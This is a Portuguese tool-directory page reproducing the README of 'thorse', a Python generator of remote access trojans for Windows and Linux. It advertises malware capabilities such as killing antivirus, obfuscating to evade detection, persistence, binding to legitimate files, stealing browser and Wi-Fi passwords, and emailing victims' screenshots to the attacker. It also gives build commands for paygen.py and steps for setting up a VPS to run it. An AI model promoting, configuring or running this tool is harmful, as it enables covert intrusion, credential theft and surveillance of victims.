Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
thorse — THorse é um gerador de RAT (Trojan de Administração Remota) para sistemas Windows/Linux escrito em Python 3. | Kitploit
Ferramentas/GitHubGitHub/pushpenderindia/thorse
Quebra de SenhasFrameworks de ExploraçãoGeração de PayloadsMecanismos de PersistênciaEvasão de IDS/IPSPós-ExploraçãoComando e ControleCavalo de Troia de Acesso RemotoAnti-Bot
GitHubpushpenderindia/thorse

thorse

THorse é um gerador de RAT (Trojan de Administração Remota) para sistemas Windows/Linux escrito em Python 3.

61412663há 3 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório

THorse

THorse é um gerador de RAT (Trojan de Administração Remota) para sistemas Windows/Linux escrito em Python 3.

                    Este pequeno script em Python pode fazer um trabalho realmente incrível.

Aviso Legal

:computer: Este projeto foi criado apenas para bons propósitos e uso pessoal.

ESTE SOFTWARE É FORNECIDO "COMO ESTÁ", SEM GARANTIA DE QUALQUER TIPO. VOCÊ PODE USAR ESTE SOFTWARE POR SUA CONTA E RISCO. O USO É DE TOTAL RESPONSABILIDADE DO USUÁRIO FINAL. OS DESENVOLVEDORES NÃO ASSUMEM NENHUMA RESPONSABILIDADE E NÃO SÃO RESPONSÁVEIS POR QUALQUER USO INDEVIDO OU DANO CAUSADO POR ESTE PROGRAMA.

Funcionalidades

  • Funciona em Windows/Linux
  • Notificar nova vítima por e-mail
  • Indetectável
  • Não requer privilégios de root ou administrador
  • Persistência
  • Envia captura de tela da tela do PC da vítima por e-mail
  • Dá acesso total ao Meterpreter ao atacante
  • Nunca precisou do Metasploit instalado para criar o trojan
  • Cria binário executável com zero dependências
  • Cria payload de tamanho reduzido ~ 5 MB com funcionalidade avançada
  • Ofusca o payload antes de compilá-lo, contornando assim mais alguns antivírus
  • O payload gerado é codificado com Base64, dificultando extremamente a engenharia reversa
  • Mata o antivírus no PC da vítima e tenta desabilitar a Central de Segurança do Windows
  • Interface colorida incrível para gerar payload
  • No lado do atacante: ao criar o payload, o script detecta automaticamente dependências ausentes e as instala
  • Capaz de adicionar um ícone personalizado ao arquivo malicioso
  • Binder integrado que pode vincular o executável a Qualquer Arquivo [.pdf, .txt, .exe etc], executando o arquivo legítimo na frente e códigos maliciosos em segundo plano como um serviço.
  • Verifica se já existe uma instância em execução no sistema. Se uma instância em execução for encontrada, apenas o arquivo legítimo é executado [Proibidor de Múltiplas Instâncias].
  • O atacante pode criar/compilar para Windows/Linux usando sistema Linux, mas só pode criar/compilar executável Windows usando máquina Windows
  • Recupera senhas salvas do sistema da vítima e as envia para o atacante.
Recuperações suportadas, tenta recuperar senhas salvas de:
Navegador Chrome
Wi-Fi

Nota: O Stealer personalizado foi codificado, não depende do LaZagne

Testado em

Kali) Kali Linux - EDIÇÃO ROLLING

Windows) Windows 10

Windows) Windows 8.1 - Pro

Windows) Windows 7 - Ultimate

A seguir estão as limitações do payload meterpreter gerado usando metasploit:-

  • É necessário executar o Listener do Metasploit antes de executar o backdoor
  • O backdoor por si só não se torna persistente, temos que usar os módulos de pós-exploração para torná-lo persistente. E os módulos de pós-exploração só podem ser usados após uma exploração bem-sucedida.
  • Não nos notifica sempre que o payload é executado em um novo sistema.

Todos sabemos o quão poderoso é o payload Meterpreter, mas ainda assim o payload feito a partir dele não é satisfatório.

A seguir estão as funcionalidades deste gerador de payload que lhe darão uma boa ideia deste script em Python:-

  • Usa o registro do Windows para se tornar persistente no Windows.
  • Também consegue se tornar persistente em sistema Linux.
  • O payload pode ser executado tanto em LINUX quanto em WINDOWS.
  • Fornece acesso total, pois o listener do metasploit pode ser usado, além de suportar listener personalizado (Você pode Criar Seu Próprio Listener)
  • Envia notificação por e-mail sempre que o payload é executado em um novo sistema, com informações completas do sistema.
  • Gera payload em 1 minuto ou menos.
  • Suporta todos os módulos de pós-exploração do meterpreter.
  • O payload pode ser criado tanto em Windows quanto em Linux.

Pré-requisitos

  • Python 3.X
  • Alguns módulos externos

Observação importante:

No Windows, por favor, especifique/defina o caminho do Pyinstaller em paygen.py [Linha 14]

O caminho padrão é: PYTHON_PYINSTALLER_PATH = os.path.expanduser("C:/Python37-32/Scripts/pyinstaller.exe")

Altere de acordo com o seu sistema

Como Usar no Linux

# Install dependencies 
$ Install latest python 3.x

# Navigate to the /opt directory (optional)
$ cd /opt/

# Clone this repository
$ git clone https://github.com/PushpenderIndia/thorse.git

# Go into the repository
$ cd thorse

# Installing dependencies
$ bash installer_linux.sh

# If you are getting any errors while executing installer_linux.sh, try to install using installer_linux.py
$ python3 installer_linux.py

$ chmod +x paygen.py
$ python3 paygen.py --help

# Making Payload/RAT
$ python3 paygen.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path

# Making Payload/RAT with Custom AVKiller [By Default, Tons of Know AntiVirus is added in Kill_Targets]
$ python3 paygen.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path --kill_av AntiVirus.exe

# Making Payload/RAT with Custom Time to become persistence
$ python3 paygen.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path --persistence 10 

Note: You can also use our custom icons from the icon folder, just use them like this  --icon icon/pdf.ico

Como Usar em VPS (Recomendado)

# 1. Setup a VPS, You can buy Ubuntu VPS from any VPS Provider such as Digital Ocean, Linode, AWS, etc

# 2. Connect to your VPS Using SSH
$ ssh username@ip_address

# 3. Update Your Linux VPS
$ sudo apt update

# 4. Add Kali Linux Repository
$ sudo sh -c "echo 'deb https://http.kali.org/kali kali-rolling main non-free contrib' > /etc/apt/sources.list.d/kali.list"

# 5. Install gnupg package
$ sudo apt install gnupg

# 6. Add Kali Public Keys
$ wget 'https://archive.kali.org/archive-key.asc' && sudo apt-key add archive-key.asc

# 7. Update VPS
$ sudo apt update

# 8. Set Kali Priority
$ sudo sh -c "echo 'Package: *'>/etc/apt/preferences.d/kali.pref; echo 'Pin: release a=kali-rolling'>>/etc/apt/preferences.d/kali.pref; echo 'Pin-Priority: 50'>>/etc/apt/preferences.d/kali.pref"

# 9. Update VPS
$ sudo apt update

# 10. Install Metasploit Framework in VPS
$ sudo apt install -t kali-rolling metasploit-framework

# NOTE: Above Steps needs to be performed only for once 

# 11. Install pip3
$ sudo apt install python3-pip
Baixar ferramenta